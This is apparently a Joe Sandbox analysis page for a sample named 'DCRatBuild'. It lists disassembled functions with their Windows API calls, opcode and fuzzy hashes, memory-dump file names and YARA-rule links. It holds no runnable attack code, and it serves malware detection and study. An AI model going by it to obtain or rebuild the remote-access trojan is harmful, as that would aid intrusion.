Opcode ID: d3d9cede8235069757fce389599ed5ee639a686eddf67949295facfc1cdb0543
Instruction ID: 33b6ffb79ef850da089658068d32c468d2a145af10677be2c2e7a7720ec2e5de
Opcode Fuzzy Hash: d3d9cede8235069757fce389599ed5ee639a686eddf67949295facfc1cdb0543
Instruction Fuzzy Hash: 8CD02B337846396EC51032D96C039BF7E44D741FFEF460252FF089A1C28462494045D6

Function 008EE1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EE20B

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Strings

3To, xrefs: 008EE1F9, 008EE205

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: ea94822389d13356a95f14dd0a7f66e41be1f0f0baf53b1565a47c5d3ab1af48
Instruction ID: df62dfddaf93d6319b026d5856cfad7b644930a0b7e1266e1fad744a528d8553
Opcode Fuzzy Hash: ea94822389d13356a95f14dd0a7f66e41be1f0f0baf53b1565a47c5d3ab1af48
Instruction Fuzzy Hash: 2BB012A126E2417C320C5206FD06D36031CD4C2B54330C01AB306E40C09A809C0D4433

Function 008FB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 008FAF1B: GetOEMCP.KERNEL32(00000000,?,?,008FB1A5,?), ref: 008FAF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008FB1EA,?,00000000), ref: 008FB3C4
GetCPInfo.KERNEL32(00000000,008FB1EA,?,?,?,008FB1EA,?,00000000), ref: 008FB3D7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 1cd9e787c2cd6948d2290b95dc8484fe6b2f6d07d58d1f148fa6f7b08cbe56a9
Instruction ID: bc3b3b07d8122b6c180f22d975a6b67a7974a2e231dccb794e47ec1416ec65e0
Opcode Fuzzy Hash: 1cd9e787c2cd6948d2290b95dc8484fe6b2f6d07d58d1f148fa6f7b08cbe56a9
Instruction Fuzzy Hash: 775175B0A0020D9EDB24CF75C8806BABBE5FF65310F28846ED286CB253D739D941CB95

Function 008D1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D1385

Part of subcall function 008D6057: __EH_prolog.LIBCMT ref: 008D605C

Part of subcall function 008DC827: __EH_prolog.LIBCMT ref: 008DC82C
Part of subcall function 008DC827: new.LIBCMT ref: 008DC86F
Part of subcall function 008DC827: new.LIBCMT ref: 008DC893

new.LIBCMT ref: 008D13FE

Part of subcall function 008DB07D: __EH_prolog.LIBCMT ref: 008DB082

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7785fd04deac294ba3880b3b29c3a72ca41a5f8b00a0cabdf19eaaf841201361
Instruction ID: 99188ff290fd4f8992be4521644aa0f60ab236c4e1ea75dd5484cb302f216fbf
Opcode Fuzzy Hash: 7785fd04deac294ba3880b3b29c3a72ca41a5f8b00a0cabdf19eaaf841201361
Instruction Fuzzy Hash: 354126B0805B409ED724DF7984859E6FBE6FF19300F404A2ED2EEC3282DB326554CB16

Function 008D1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D1385

Part of subcall function 008D6057: __EH_prolog.LIBCMT ref: 008D605C

Part of subcall function 008DC827: __EH_prolog.LIBCMT ref: 008DC82C
Part of subcall function 008DC827: new.LIBCMT ref: 008DC86F
Part of subcall function 008DC827: new.LIBCMT ref: 008DC893

new.LIBCMT ref: 008D13FE

Part of subcall function 008DB07D: __EH_prolog.LIBCMT ref: 008DB082

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5b3141e81bd0a94d01249a949b5c1788ac9551c4ee3962c472b02cee3433ec99
Instruction ID: ba3b0b2b7d09aa108b1d83bbee1d31b543d8370c81ae5dad8f62c53a21f567a8
Opcode Fuzzy Hash: 5b3141e81bd0a94d01249a949b5c1788ac9551c4ee3962c472b02cee3433ec99
Instruction Fuzzy Hash: 4D41F4B0805B409EE724DF7984859E6FBE6FF19300F504A2ED2EE83282DB326554CB16

Function 008FB188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 008F8FA5: GetLastError.KERNEL32(?,00910EE8,008F3E14,00910EE8,?,?,008F3713,00000050,?,00910EE8,00000200), ref: 008F8FA9
Part of subcall function 008F8FA5: _free.LIBCMT ref: 008F8FDC
Part of subcall function 008F8FA5: SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F901D
Part of subcall function 008F8FA5: _abort.LIBCMT ref: 008F9023

Part of subcall function 008FB2AE: _abort.LIBCMT ref: 008FB2E0
Part of subcall function 008FB2AE: _free.LIBCMT ref: 008FB314

Part of subcall function 008FAF1B: GetOEMCP.KERNEL32(00000000,?,?,008FB1A5,?), ref: 008FAF46

_free.LIBCMT ref: 008FB200
_free.LIBCMT ref: 008FB236

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 38feb75116968f0ee928209115c9b174cd699d733095cc84142be03555d9627d
Instruction ID: 8d2993341cf0b0e7dacb9d59ddf7c8ad67b510ee869c66107e1c1bccecd5f9bc
Opcode Fuzzy Hash: 38feb75116968f0ee928209115c9b174cd699d733095cc84142be03555d9627d
Instruction Fuzzy Hash: 62317F3190420CAFDB10EFB9D841ABDB7E5FF45320F254099EA14DB291EB729E41DB51

Function 008D971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008D9EDC,?,?,008D7867), ref: 008D97A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,008D9EDC,?,?,008D7867), ref: 008D97DB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 320d3fc4664db2bc6329fa73c9f14a73f04c2a1a723127255dddb0fda900fd7d
Instruction ID: 2264ee97ed16fa25d9e5b4124ca51e99c6ee0e5055fdfa057ae8307c8be498f3
Opcode Fuzzy Hash: 320d3fc4664db2bc6329fa73c9f14a73f04c2a1a723127255dddb0fda900fd7d
Instruction Fuzzy Hash: 652126B0514748AFD7308F65C885BA7B7E8FB49764F004A2EF1E5C2291C374AC449B21

Function 008D9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008D7547,?,?,?,?), ref: 008D9D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 008D9E2C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 2a7c10216789bc274d1051f65a1a4f5fda6271733ef5d533517c6a5b67ff3de7
Instruction ID: 637f1dfde981077343c75e2c56bbe4ab4794bb2c6db91ef089bbaf0b2fb29c60
Opcode Fuzzy Hash: 2a7c10216789bc274d1051f65a1a4f5fda6271733ef5d533517c6a5b67ff3de7
Instruction Fuzzy Hash: A321D631158286AFC714DE25C451AABBBE9FF96708F044A1EF4D1C7241D729DA0CDB61

Function 008FA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 008FA4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 008FA4C5

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: a8587e63ababb09ca1fbd038ba033f25c17e38436510106a370a50b2d5086730
Instruction ID: 3b98de12dcab0e0e5701dada69f9b6c5e5433eac4a524f2103a85ac28a9090d3
Opcode Fuzzy Hash: a8587e63ababb09ca1fbd038ba033f25c17e38436510106a370a50b2d5086730
Instruction Fuzzy Hash: 1C112373A111288F9B2A9E38EC4487A73A5FB907347164220EE19EB254EA70DC41D6D6

Function 008D9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,008D9B35,?,?,00000000,?,?,008D8D9C,?), ref: 008D9BC0
GetLastError.KERNEL32 ref: 008D9BCD

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a9ed9d58033c2667c497edfd776391fe42d197f963f88577c680dc9abbad062a
Instruction ID: ca04a60f41e774de4847c8eac6e117eb5da4401575cdf9bd082280c27c19f331
Opcode Fuzzy Hash: a9ed9d58033c2667c497edfd776391fe42d197f963f88577c680dc9abbad062a
Instruction Fuzzy Hash: 3E01A9312142259F8704CE55AC9496A735DFFC5731B15872FE997C7390C67198059A21

Function 008D9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 008D9E76
GetLastError.KERNEL32 ref: 008D9E82

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 57d818ea6aef81b3c0171fd5e22ba920b150626af4c9f0c565b66cbc40dd28af
Instruction ID: eb8018b8211509ed581d93134cf2dfb0234d5551a58ab18552cb2d9e4c1cea18
Opcode Fuzzy Hash: 57d818ea6aef81b3c0171fd5e22ba920b150626af4c9f0c565b66cbc40dd28af
Instruction Fuzzy Hash: 350180717052046BEB349F6AD84476BB7D9EB84328F144B3EF186C2780DAB1E8488611

Function 008F8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008F8627

Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00910F50,008DCE57,?,?,?,?,?,?), ref: 008F8663

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 5705392239da74871860b1e785537f062723413ed97c318d620eb2af0abc36c3
Instruction ID: 1d646417aa24e332d3abbb10efad8811446f9e151350a4bb5dcdac628b0320a2
Opcode Fuzzy Hash: 5705392239da74871860b1e785537f062723413ed97c318d620eb2af0abc36c3
Instruction Fuzzy Hash: BFF0C23220511DEADB212A39AC09A7B3758FFB1BA4F244115FB14DA291DF28C80095A6

Function 008E0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 008E0915
GetProcessAffinityMask.KERNEL32(00000000), ref: 008E091C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 5fc7a4197a001cb4ba838f9ccc0391389ba77963a5edf50bfbd9f6a95dff5a0f
Instruction ID: 4ef7ae7a87cf6f49d7b386a5d4b8ac06f6381c1890ec1871104e98a50c0eec49
Opcode Fuzzy Hash: 5fc7a4197a001cb4ba838f9ccc0391389ba77963a5edf50bfbd9f6a95dff5a0f
Instruction Fuzzy Hash: FFE09B32A25149BBBF05DEB59C044BB7BADFB052147104979A806D7102F674DD418E60

Function 008DA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA489

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 57cb17f7bbe17c1b0385acb4a5f470ff8fc53cda37e2fe9eadc7820cf2bab1d0
Instruction ID: 489c404538b3895a76e37f15f96de74fe8a8941c8038c94cd8102445afd91720
Opcode Fuzzy Hash: 57cb17f7bbe17c1b0385acb4a5f470ff8fc53cda37e2fe9eadc7820cf2bab1d0
Instruction Fuzzy Hash: 6FF0A03124120DBBDF016F60DC05FDA776DFB04381F04C056BC88E6261DB72CAA8AA51

Function 008ED573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008ED5A1
SetDlgItemTextW.USER32(00000065,?), ref: 008ED5B8

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: a5f5b11682432eb7c9f083df785006150d15587624678aeae73f9a98ce5e7814
Instruction ID: 329ff48461684f3797d9c96ed7a095690a009530f73d343c9551e6c53df31868
Opcode Fuzzy Hash: a5f5b11682432eb7c9f083df785006150d15587624678aeae73f9a98ce5e7814
Instruction Fuzzy Hash: 9DF0553160838C7BEB11ABB5CC02FAA371CFB06745F000692B600D31F2DE316A20AB63

Function 008DA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,008D984C,?,?,008D9688,?,?,?,?,00901FA1,000000FF), ref: 008DA13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,008D984C,?,?,008D9688,?,?,?,?,00901FA1,000000FF), ref: 008DA16C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: c96089ede3c7df0737823107e80e157a7e2954cb55d5aaa212b1028119cc4214
Instruction ID: c2c42568beb473ec0fb3e322153fa278a4518c536fb02338bf296ce6f5d1a4c4
Opcode Fuzzy Hash: c96089ede3c7df0737823107e80e157a7e2954cb55d5aaa212b1028119cc4214
Instruction Fuzzy Hash: 71E09235651209ABDB11AF65DC41FE9776CFB08381F488166B888C3260DB61DD94AA91

Function 008EA39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00901FA1,000000FF), ref: 008EA3D1
OleUninitialize.OLE32(?,?,?,?,00901FA1,000000FF), ref: 008EA3D6

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 43d59092b118bb8c0dcfc0cea4f0346f2c4f2fbad484c156477f4a019c558df9
Instruction ID: 3853774d06215fcdf557f4e5e5fcf339ac8e2184af8a1c7a29e31d35ad901795
Opcode Fuzzy Hash: 43d59092b118bb8c0dcfc0cea4f0346f2c4f2fbad484c156477f4a019c558df9
Instruction Fuzzy Hash: B0F0307261C655DFC7109B4DDD05B55FBADFB89B20F04836AF519837A0CB746800DA91

Function 008DA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,008DA189,?,008D76B2,?,?,?,?), ref: 008DA1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,008DA189,?,008D76B2,?,?,?,?), ref: 008DA1D1

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AttributesFile
String ID:
